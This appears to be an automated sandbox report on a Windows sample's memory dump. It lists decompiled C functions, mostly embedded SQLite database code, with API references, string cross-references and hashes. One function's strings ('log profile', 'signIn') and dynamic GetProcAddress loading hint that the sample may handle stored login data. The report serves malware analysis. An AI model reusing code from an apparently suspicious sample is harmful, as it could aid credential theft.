								 *(_t169 + 4) =  *(_t169 + 4) + 1;
								__eflags = _t107 - 0x13;
								_v12 = _t107;
								if(_t107 != 0x13) {
									__eflags = _t107;
									if(_t107 != 0) {
										L36:
										_push(_a12);
										_t158 = _t169;
										 *((char*)(_t137 + 9)) = 3;
										E00415BE9();
										__eflags = _v12;
										_pop(_t142);
										 *_t137 = _t107;
										if(_v12 != 0) {
											L40:
											_t108 =  *(_t169 + 8);
											_t167 =  *(_t169 + 4) - 1;
											_t139 = _t167 << 4;
											_t109 =  *(_t108 + _t139 + 4);
											__eflags =  *(_t108 + _t139 + 4);
											if( *(_t108 + _t139 + 4) != 0) {
												E0041F0AC(_t109, _t181);
												 *( *(_t169 + 8) + _t139 + 4) =  *( *(_t169 + 8) + _t139 + 4) & 0x00000000;
												_t120 =  *(_t169 + 8);
												_t72 = _t120 + _t139 + 0xc;
												 *_t72 =  *(_t120 + _t139 + 0xc) & 0x00000000;
												__eflags =  *_t72;
											}
											_t135 = _t169;
											_t99 = E004300E8(0, _t169);
											__eflags = _v12 - 7;
											 *(_t169 + 4) = _t167;
											if(__eflags == 0) {
												L46:
												 *((char*)(_t169 + 0x1e)) = 1;
												_push(_v8);
												_push(_t169);
												_t111 = L004158F6(_t99, _t135, _t142, _t158, _t167, _t169, __eflags, _t181);
												_push("out of memory");
												_t112 = E004165FF(_t111, _t135, _t142, _t158);
												goto L47;
											} else {
												__eflags = _v12 - 0xc0a;
												if(__eflags == 0) {
													goto L46;
												}
												__eflags = _v8;
												if(_v8 != 0) {
													goto L48;
												}
												_push(_v16);
												_push("unable to open database: %s");
												goto L6;
											}
										}
										__eflags = _t107;
										if(_t107 != 0) {
											_t101 = _t169;
											0x4380f6( &_v8);
											__eflags = _t101;
											_pop(_t142);
											_v12 = _t101;
											if(_t101 == 0) {
												goto L53;
											}
											goto L40;
										}
										_v12 = 7;
										goto L40;
									}
									_t122 =  *_t165;
									0x43302c(_t169);
									__eflags = _t122;
									 *(_t137 + 0xc) = _t122;
									if(_t122 != 0) {
										__eflags =  *((char*)(_t122 + 0x48));
										if( *((char*)(_t122 + 0x48)) != 0) {
											_t156 =  *((intOrPtr*)( *(_t169 + 8) + 0xc));
											_t130 =  *((intOrPtr*)(_t122 + 0x49));
											__eflags =  *((intOrPtr*)(_t122 + 0x49)) -  *((intOrPtr*)(_t156 + 0x49));
											if( *((intOrPtr*)(_t122 + 0x49)) !=  *((intOrPtr*)(_t156 + 0x49))) {
												_push("attached databases must use the same text encoding as main database");
												_v8 = E004165FF(_t130, _t137, _t156, _t158);
												_v12 = 1;
											}
										}
									} else {
										_v12 = 7;
									}
									_t153 =  *(_t169 + 0x1f) & 0x000000ff;
									__eflags = _t153;
									_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t165 + 4))));
									if(_t153 < 0) {
										L32:
										_t127 =  *( *(_t169 + 8) + 4);
										__eflags = _t127;
										if(_t127 != 0) {
											_t127 =  *( *((intOrPtr*)(_t127 + 4)) + 0x12) & 0x000000ff;
										}
										_t107 = E0041F188( *_t165, _t153, _t127);
										L35:
										goto L36;
									} else {
										__eflags =  *((char*)(_t125 + 0xc));
										if( *((char*)(_t125 + 0xc)) != 0) {
											goto L32;
										}
										_t160 =  *(_t125 + 0xac);
										__eflags = _t160;
										if(_t160 == 0) {
											L31:
											 *(_t125 + 4) = _t153;
											goto L32;
										}
										__eflags =  *((char*)(_t160 + 0x1e)) - 2;
										if( *((char*)(_t160 + 0x1e)) == 2) {
											goto L32;
										}
										goto L31;
									}
								}
								_push("database is already attached");
								_v12 = 1;
								_t107 = E004165FF(_t107, _t137, _t145, _t158);
								_v8 = _t107;
								goto L35;
							}
							_t101 = L00415AB7(_t100, _t143, _t158, _t162, _t169, __eflags);
							_t136 = _t101;
							__eflags = _t136;
							_t145 = 0x30;
							if(_t136 == 0) {
								goto L53;
							}
							memcpy(_t136,  *(_t169 + 8), 0x20);
							_t170 = _t170 + 0xc;
							goto L19;
						}
						_v20 =  *(_t169 + 8);
						while(1) {
							_t158 = _a12;
							_t142 =  *_v20;
							_t99 = L00416A42(_t135,  *_v20, _a12, _t169, _t181);
							__eflags = _t99;
							if(_t99 == 0) {
								break;
							}
							_v20 = _v20 + 0x10;
							_t135 = _t135 + 1;
							__eflags = _t135 - _t162;
							if(_t135 < _t162) {
								continue;
							}
							goto L14;
						}
						_push(_a12);
						_push("database %s is already in use");
						goto L6;
					}
					_push("cannot ATTACH database within transaction");
					_t112 = E004165FF(_t99, _t135, _t142, _t158);
					goto L7;
				} else {
					_push(_t99);
					_push("too many attached databases - max %d");
					L6:
					_t112 = E004165FF(_t99, _t135, _t142, _t158);
					L7:
					_pop(_t142);
					L47:
					_t177 = _t112;
					_v8 = _t112;
					if(_t112 == 0) {
						_t168 = _a4;
						L50:
						_t101 = _v12;
						if(_t101 == 0) {
							L53:
							return _t101;
						}
						 *(_t168 + 0x34) = _t101;
						if(( *(_t168 + 0x24) & 0x00000001) == 0) {
							goto L53;
						}
						0x444043();
						return E00422B84(0, _v24, _t181, _t101, 1);
					}
					L48:
					_t168 = _a4;
					_t116 = E00425015(_t168, _v8);
					_pop(_t149);
					_push(_v8);
					L004158F6(_t116, _t135, _t149, _t158, _t168, _t169, _t177, _t181);
					_t142 = _t169;
					goto L50;
				}
			}

0x0042f5f4
0x0042f5f4
0x0042f605
0x0042f608
0x0042f60a
0x0042f60c
0x0042f60f
0x0042f612
0x0042f61e
0x0042f629
0x0042f632
0x0042f634
0x0042f634
0x0042f63a
0x0042f63c
0x0042f63c
0x0042f63f
0x0042f642
0x0042f645
0x0042f64a
0x0042f65e
0x0042f661
0x0042f66f
0x0042f671
0x0042f693
0x0042f693
0x0042f696
0x0042f69c
0x0042f69e
0x0042f6d0
0x0042f6d3
0x0042f6d8
0x0042f6da
0x0042f6dc
0x0042f6dd
0x00000000
0x00000000
0x0042f6e3
0x0042f6eb
0x0042f6ee
0x0042f6f3
0x0042f703
0x0042f704
0x0042f706
0x0042f706
0x0042f709
0x0042f70a
0x0042f70b
0x0042f70e
0x0042f716
0x0042f719
0x0042f71c
0x0042f71f
0x0042f73a
0x0042f73c
0x0042f7c6
0x0042f7c6
0x0042f7c9
0x0042f7cb
0x0042f7cf
0x0042f7d4
0x0042f7d8
0x0042f7d9
0x0042f7db
0x0042f801
0x0042f804
0x0042f807
0x0042f80a
0x0042f80d
0x0042f811
0x0042f813
0x0042f815
0x0042f81d
0x0042f822
0x0042f825
0x0042f825
0x0042f825
0x0042f825
0x0042f82c
0x0042f82e
0x0042f833
0x0042f837
0x0042f83a
0x0042f858
0x0042f858
0x0042f85c
0x0042f85f
0x0042f860
0x0042f865
0x0042f86a
0x00000000
0x0042f83c
0x0042f83c
0x0042f843
0x00000000
0x00000000
0x0042f845
0x0042f849
0x00000000
0x00000000
0x0042f84b
0x0042f84e
0x00000000
0x0042f84e
0x0042f83a
0x0042f7dd
0x0042f7df
0x0042f7ee
0x0042f7f0
0x0042f7f5
0x0042f7f7
0x0042f7f8
0x0042f7fb
0x00000000
0x00000000
0x00000000
0x0042f7fb
0x0042f7e1
0x00000000
0x0042f7e1
0x0042f742
0x0042f745
0x0042f74a
0x0042f74d
0x0042f750
0x0042f75b
0x0042f75f
0x0042f764
0x0042f767
0x0042f76a
0x0042f76d
0x0042f76f
0x0042f77a
0x0042f77d
0x0042f77d
0x0042f76d
0x0042f752
0x0042f752
0x0042f752
0x0042f784
0x0042f788
0x0042f78f
0x0042f791
0x0042f7ac
0x0042f7af
0x0042f7b2
0x0042f7b4
0x0042f7b9
0x0042f7b9
0x0042f7c0
0x0042f7c5
0x00000000
0x0042f793
0x0042f793
0x0042f797
0x00000000
0x00000000
0x0042f799
0x0042f79f
0x0042f7a1
0x0042f7a9
0x0042f7a9
0x00000000
0x0042f7a9
0x0042f7a3
0x0042f7a7
0x00000000
0x00000000
0x00000000
0x0042f7a7
0x0042f791
0x0042f721
0x0042f726
0x0042f72d
0x0042f732
0x00000000
0x0042f732
0x0042f6a2
0x0042f6a7
0x0042f6a9
0x0042f6ab
0x0042f6ac
0x00000000
0x00000000
0x0042f6b8
0x0042f6bd
0x00000000
0x0042f6bd
0x0042f676
0x0042f679
0x0042f67c
0x0042f67f
0x0042f681
0x0042f686
0x0042f688
0x00000000
0x00000000
0x0042f68a
0x0042f68e
0x0042f68f
0x0042f691
0x00000000
0x00000000
0x00000000
0x0042f691
0x0042f6c2
0x0042f6c5
0x00000000
0x0042f6c5
0x0042f663
0x0042f668
0x00000000
0x0042f64c
0x0042f64c
0x0042f64d
0x0042f652
0x0042f652
0x0042f658
0x0042f658
0x0042f872
0x0042f872
0x0042f874
0x0042f877
0x0042f894
0x0042f897
0x0042f897
0x0042f89c
0x0042f8c2
0x0042f8c2
0x0042f8c2
0x0042f8a2
0x0042f8a5
0x00000000
0x00000000
0x0042f8a9
0x00000000
0x0042f8bd
0x0042f879
0x0042f879
0x0042f881
0x0042f886
0x0042f887
0x0042f88b
0x0042f891
0x00000000
0x0042f891

APIs

memcpy.MSVCRT ref: 0042F6B8
memset.MSVCRT ref: 0042F6F3

Strings

attached databases must use the same text encoding as main database, xrefs: 0042F76F
database is already attached, xrefs: 0042F721
out of memory, xrefs: 0042F865
unable to open database: %s, xrefs: 0042F84E
too many attached databases - max %d, xrefs: 0042F64D
database %s is already in use, xrefs: 0042F6C5
cannot ATTACH database within transaction, xrefs: 0042F663

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: c263c0c1150a3d7ce2c9273929f4f53f489925588d125c0751b503aeabd15d5a
Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
Opcode Fuzzy Hash: c263c0c1150a3d7ce2c9273929f4f53f489925588d125c0751b503aeabd15d5a
Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044DEF7, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0044DF01
??3@YAXPAX@Z.MSVCRT ref: 0044DF11
??3@YAXPAX@Z.MSVCRT ref: 0044DF21
??3@YAXPAX@Z.MSVCRT ref: 0044DF31

Strings

`yk, xrefs: 0044DF27
Xuk, xrefs: 0044DF07
h}k, xrefs: 0044DF17

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID: Xuk$`yk$h}k
API String ID: 613200358-2056059822
Opcode ID: 65374a4da892ca34daad621f81a4ae36430e038597fbe465d7da9e77e1b4440a
Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
Opcode Fuzzy Hash: 65374a4da892ca34daad621f81a4ae36430e038597fbe465d7da9e77e1b4440a
Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7D9, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041B7D9(unsigned int __eax, signed int __ecx, void* __edx, void* __fp0, int* _a4, signed int _a8, signed int _a12) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				int _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t119;
				signed int _t120;
				void* _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				void* _t128;
				signed int _t129;
				void* _t131;
				void* _t133;
				char _t138;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				void* _t155;
				void* _t159;
				void* _t164;
				int _t166;
				void* _t169;
				signed int _t174;
				intOrPtr* _t176;
				char* _t182;
				short _t189;
				void* _t195;
				char* _t197;
				int _t198;
				signed int _t200;
				void* _t202;
				void* _t205;
				void* _t206;
				void* _t216;

				_t216 = __fp0;
				_t195 = __edx;
				_t200 = __ecx;
				_push(_t197);
				_t166 = 0;
				_v28 =  !__eax & 0x00000001;
				_v32 = __eax >> 0x00000001 & 0x00000001;
				_t119 =  *((intOrPtr*)(__ecx + 4));
				_t174 = 0x28;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v20 = 0x400;
				if(_t119 <= _t174) {
					_v16 = _t174;
					_t120 = _t174;
				} else {
					_t120 = _t119 + 0x00000007 & 0xfffffff8;
					_v16 = _t120;
				}
				 *_a4 = _t166;
				_t176 = _a8;
				if(_t176 == _t166 ||  *_t176 == _t166) {
					L14:
					_push(( *((intOrPtr*)(_t200 + 4)) + 0x00000007 & 0xfffffff8) + _t120 * 2 + 0xf7 + _t166 * 3);
					_t123 = L00415A6D(( *((intOrPtr*)(_t200 + 4)) + 0x00000007 & 0xfffffff8) + _t120 * 2 + 0xf7 + _t166 * 3, _t166 * 3, _t197, _t200, _t216);
					_pop(_t182);
					if(_t123 != 0) {
						_t198 = _t123;
						_t124 = _t123 + 0xb8;
						 *(_t198 + 0xa8) = _t124;
						_t125 = _t124 + 0x30;
						 *((intOrPtr*)(_t198 + 0x3c)) = _t125;
						_t126 = _t125 + ( *((intOrPtr*)(_t200 + 4)) + 0x00000007 & 0xfffffff8);
						 *((intOrPtr*)(_t198 + 0x44)) = _t126;
						_t127 = _t126 + _v16;
						 *((intOrPtr*)(_t198 + 0x40)) = _t127;
						_t128 = _t127 + _v16;
						 *(_t198 + 0x90) = _t128;
						if(_v12 != 0) {
							 *(_t198 + 0x94) = _t128 + _t166 + 1;
							memcpy(_t128, _v12, _t166);
							memcpy( *(_t198 + 0x94), _v12, _t166);
							memcpy( *(_t198 + 0x94) + _t166, "-journal", 8);
							_t155 =  *(_t198 + 0x94) + _t166 + 9;
							 *(_t198 + 0xb0) = _t155;
							memcpy(_t155, _v12, _t166);
							_t159 = memcpy( *(_t198 + 0xb0) + _t166, "-wal", 4);
							_t206 = _t206 + 0x3c;
							_push(_v12);
							E0041589B(_t159, _t166, _t128 + _t166 + 1, _t195, _t198, _t216);
						}
						_t186 = _a8;
						_t129 = _a12;
						 *_t198 = _t200;
						 *(_t198 + 0x78) = _t129;
						if(_t186 == 0 ||  *_t186 == 0) {
							_t166 = 1;
							_t130 = _t129 & 1;
							 *((char*)(_t198 + 0xf)) = 1;
							 *((char*)(_t198 + 0x10)) = 4;
							_a8 = _t129 & 1;
						} else {
							_v16 = _v16 & 0x00000000;
							_push( &_v16);
							_push( *((intOrPtr*)(_t198 + 0x3c)));
							_t186 = _t200;
							_push( *(_t198 + 0x90));
							_v8 = E004151E3(_t129, _t166, _t200, _t195, _t198, _t200);
							_t130 = _v16 & 0x00000001;
							_t206 = _t206 + 0xc;
							_a8 = _t130;
							if(_v8 != 0) {
								L30:
								_t131 = L0041518C(_t130, _t166, _t186, _t195, _t198,  *((intOrPtr*)(_t198 + 0x3c)));
								_push(_t198);
								E0041589B(_t131, _t166, _t186, _t195, _t198, _t216);
								_t133 = _v8;
								goto L37;
							}
							if(_t130 != 0) {
								L27:
								_t166 = _v24;
								L28:
								if(_v8 != 0) {
									goto L30;
								}
								_t130 = E0041B1CA(_t198, _t216,  &_v20, 0xffffffff);
								_pop(_t186);
								_v8 = _t130;
								if(_t130 == 0) {
									_t202 =  *(_t198 + 0xa8);
									memset(_t202, 0, 0x30);
									 *((intOrPtr*)(_t202 + 0x14)) = _v20;
									_t138 = 1;
									_t189 = 0x50;
									 *((intOrPtr*)(_t202 + 0x18)) = _t189;
									 *((intOrPtr*)(_t202 + 0x1c)) = 1;
									 *((intOrPtr*)(_t202 + 0x20)) = E0041B715;
									 *(_t202 + 0x24) = _t198;
									 *((intOrPtr*)(_t202 + 0x10)) = 0x64;
									 *((char*)(_t198 + 6)) = _v28;
									if(_v32 == 0 || _a8 == 0) {
										_t138 = 0;
									}
									 *((char*)(_t198 + 7)) = _t138;
									_t139 = _a8;
									 *(_t198 + 0xd) = _t139;
									_t140 = _t139 & 0xffffff00 | _t166 == 0x00000000;
									 *(_t198 + 9) = _t140;
									 *(_t198 + 0x88) =  *(_t198 + 0x88) | 0xffffffff;
									 *(_t198 + 0x8c) =  *(_t198 + 0x8c) | 0xffffffff;
									 *((intOrPtr*)(_t198 + 0x84)) = 0x3fffffff;
									 *(_t198 + 0xc) = _t166;
									 *(_t198 + 4) = _t166;
									 *(_t198 + 0x11) = _t166;
									 *((char*)(_t198 + 0xe)) = 0;
									_t143 = (_t140 & 0xffffff00 | _t166 != 0x00000000) - 0x00000001 & 0x00000002;
									 *(_t198 + 8) = _t166;
									 *(_t198 + 0xb) = _t143;
									 *(_t198 + 0xa) = _t143;
									 *((short*)(_t198 + 0x74)) = _t189;
									E0041A9A0(_t198);
									if(_v28 == 0) {
										 *((char*)(_t198 + 5)) = 2;
									}
									 *((intOrPtr*)(_t198 + 0xa0)) = E0041EE7A;
									 *_a4 = _t198;
									_t133 = 0;
									goto L37;
								}
								goto L30;
							}
							E0041A9A0(_t198);
							_t130 =  *(_t198 + 0x7c);
							if(_t130 <= 0x400) {
								goto L27;
							}
							_t166 = _v24;
							_t186 = 0x2000;
							if(_t130 <= 0x2000) {
								_v20 = _t130;
							} else {
								_v20 = 0x2000;
							}
						}
						goto L28;
					}
					_t205 = 7;
					goto L12;
				} else {
					_t169 =  *((intOrPtr*)(_t200 + 8)) + 1;
					_push(_t169 + _t169);
					_t197 = E004156AA(_t169 + _t169, _t169, _t176, _t195, _t197, _t200);
					_v12 = _t197;
					if(_t197 != 0) {
						 *_t197 = 0;
						_t164 =  *((intOrPtr*)(_t200 + 0x24))(_t200, _a8, _t169, _t197);
						_t206 = _t206 + 0x10;
						_t182 = _t197;
						_v8 = _t164;
						_t166 = E0041691B(_t164, _t195, _t197);
						if(_v8 != 0) {
							L11:
							_t205 = _v8;
							L12:
							_push(_v12);
							E0041589B(_t123, _t166, _t182, _t195, _t197, _t216);
							_t133 = _t205;
							L37:
							return _t133;
						}
						_t19 = _t166 + 8; // 0x8
						_t123 = _t19;
						if(_t123 >  *((intOrPtr*)(_t200 + 8))) {
							0x444706();
							_t182 = 0x996e;
							_v8 = _t123;
						}
						if(_v8 == 0) {
							_t120 = _v16;
							goto L14;
						} else {
							goto L11;
						}
					}
					_t133 = 7;
					goto L37;
				}
			}

0x0041b7d9
0x0041b7d9
0x0041b7e1
0x0041b7e9
0x0041b7f0
0x0041b7f4
0x0041b7f7
0x0041b7fa
0x0041b7fd
0x0041b800
0x0041b803
0x0041b806
0x0041b809
0x0041b810
0x0041b81d
0x0041b820
0x0041b812
0x0041b815
0x0041b818
0x0041b818
0x0041b825
0x0041b827
0x0041b82c
0x0041b8a4
0x0041b8bc
0x0041b8bd
0x0041b8c4
0x0041b8c5
0x0041b8cc
0x0041b8ce
0x0041b8d3
0x0041b8d9
0x0041b8dc
0x0041b8e8
0x0041b8ea
0x0041b8ed
0x0041b8f0
0x0041b8f3
0x0041b8fa
0x0041b900
0x0041b90b
0x0041b911
0x0041b923
0x0041b93b
0x0041b94d
0x0041b952
0x0041b958
0x0041b970
0x0041b975
0x0041b978
0x0041b97b
0x0041b980
0x0041b981
0x0041b986
0x0041b989
0x0041b98b
0x0041b98e
0x0041b9ef
0x0041b9f0
0x0041b9f2
0x0041b9f5
0x0041b9f9
0x0041b995
0x0041b995
0x0041b99c
0x0041b99d
0x0041b9a0
0x0041b9a2
0x0041b9ad
0x0041b9b3
0x0041b9b6
0x0041b9bd
0x0041b9c0
0x0041ba1b
0x0041ba1e
0x0041ba23
0x0041ba24
0x0041ba29
0x00000000
0x0041ba2c
0x0041b9c4
0x0041b9fe
0x0041b9fe
0x0041ba01
0x0041ba05
0x00000000
0x00000000
0x0041ba0d
0x0041ba15
0x0041ba16
0x0041ba19
0x0041ba32
0x0041ba3d
0x0041ba4b
0x0041ba52
0x0041ba57
0x0041ba58
0x0041ba5b
0x0041ba5e
0x0041ba65
0x0041ba68
0x0041ba6f
0x0041ba72
0x0041ba7a
0x0041ba7a
0x0041ba7c
0x0041ba7f
0x0041ba82
0x0041ba87
0x0041ba8a
0x0041ba92
0x0041ba99
0x0041baa4
0x0041baae
0x0041bab1
0x0041bab4
0x0041bab7
0x0041babb
0x0041babe
0x0041bac1
0x0041bac4
0x0041bac7
0x0041bacb
0x0041bad4
0x0041bad6
0x0041bad6
0x0041badd
0x0041bae7
0x0041bae9
0x00000000
0x0041bae9
0x00000000
0x0041ba19
0x0041b9c8
0x0041b9cd
0x0041b9d5
0x00000000
0x00000000
0x0041b9d7
0x0041b9da
0x0041b9e1
0x0041b9e8
0x0041b9e3
0x0041b9e3
0x0041b9e3
0x0041b9e1
0x00000000
0x0041b98e
0x0041b8c9
0x00000000
0x0041b832
0x0041b835
0x0041b839
0x0041b83f
0x0041b844
0x0041b847
0x0041b856
0x0041b85a
0x0041b85d
0x0041b860
0x0041b862
0x0041b86e
0x0041b870
0x0041b88e
0x0041b88e
0x0041b891
0x0041b891
0x0041b894
0x0041b89a
0x0041baeb
0x0041baef
0x0041baef
0x0041b872
0x0041b872
0x0041b878
0x0041b87f
0x0041b884
0x0041b885
0x0041b885
0x0041b88c
0x0041b8a1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b88c
0x0041b84b
0x00000000
0x0041b84b

APIs

memcpy.MSVCRT ref: 0041B911
memcpy.MSVCRT ref: 0041B923
memcpy.MSVCRT ref: 0041B93B
memcpy.MSVCRT ref: 0041B958
memcpy.MSVCRT ref: 0041B970
memset.MSVCRT ref: 0041BA3D

Strings

-wal, xrefs: 0041B96A
-journal, xrefs: 0041B935

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: 8793c502ae5dfaeecf4dd106aabbbc2dbd89604f53f7f0aefe3ae0e7cf36867e
Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
Opcode Fuzzy Hash: 8793c502ae5dfaeecf4dd106aabbbc2dbd89604f53f7f0aefe3ae0e7cf36867e
Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00444C89, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00444D09
_wcsicmp.MSVCRT ref: 00444D1E
_wcsicmp.MSVCRT ref: 00444D33

Strings

https://, xrefs: 00444CCB
signIn, xrefs: 00444D2D
http://, xrefs: 00444CC0
log profile, xrefs: 00444C97
.save, xrefs: 00444D03

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: .save$http://$https://$log profile$signIn
API String ID: 2081463915-2708368587
Opcode ID: 289f0524e8fc8308eeb4ba37ac8c291c786fbf28451544ddd34c6915d987cfe3
Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
Opcode Fuzzy Hash: 289f0524e8fc8308eeb4ba37ac8c291c786fbf28451544ddd34c6915d987cfe3
Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D

Uniqueness

Uniqueness Score: -1.00%

Function 00444432, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004444E3

Strings

NOCASE, xrefs: 004445A4
BINARY, xrefs: 0044454A, 0044454F, 0044455B, 00444567, 0044458C
temp, xrefs: 00444623
no such vfs: %s, xrefs: 0044452B
RTRIM, xrefs: 00444573
main, xrefs: 00444613

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 469410b2ad90f3981089a7884c8dbe722d142103d754686b8451430038a644d0
Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
Opcode Fuzzy Hash: 469410b2ad90f3981089a7884c8dbe722d142103d754686b8451430038a644d0
Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99

Uniqueness

Uniqueness Score: -1.00%

Function 0044A7C0, Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA

memcpy.MSVCRT ref: 0044A8BF
memcpy.MSVCRT ref: 0044A90C
memcpy.MSVCRT ref: 0044A9D8
memcpy.MSVCRT ref: 0044A988

Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E

memcpy.MSVCRT ref: 0044AA19
memcpy.MSVCRT ref: 0044AA4A

Strings

gj, xrefs: 0044A7D9

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID: gj
API String ID: 438689982-4203073231
Opcode ID: 24574833a66052b4b9a32c4e9e4d257aea8e1b6d8d035c9b326ae277e520f917
Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
Opcode Fuzzy Hash: 24574833a66052b4b9a32c4e9e4d257aea8e1b6d8d035c9b326ae277e520f917
Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797

Uniqueness

Uniqueness Score: -1.00%

Function 00430C36, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00430D77

Strings

t\El\E, xrefs: 00430D91
, xrefs: 00430CAC
, , xrefs: 00430CB3
h\E, xrefs: 00430D19
CREATE TABLE , xrefs: 00430CEB
h\E, xrefs: 00430D2B

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
API String ID: 3510742995-2446657581
Opcode ID: 93ac9194893ddb1e1d4c9a75bb48ab8045f936491bb81f1618091b87194d886e
Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
Opcode Fuzzy Hash: 93ac9194893ddb1e1d4c9a75bb48ab8045f936491bb81f1618091b87194d886e
Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004449B9, Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D

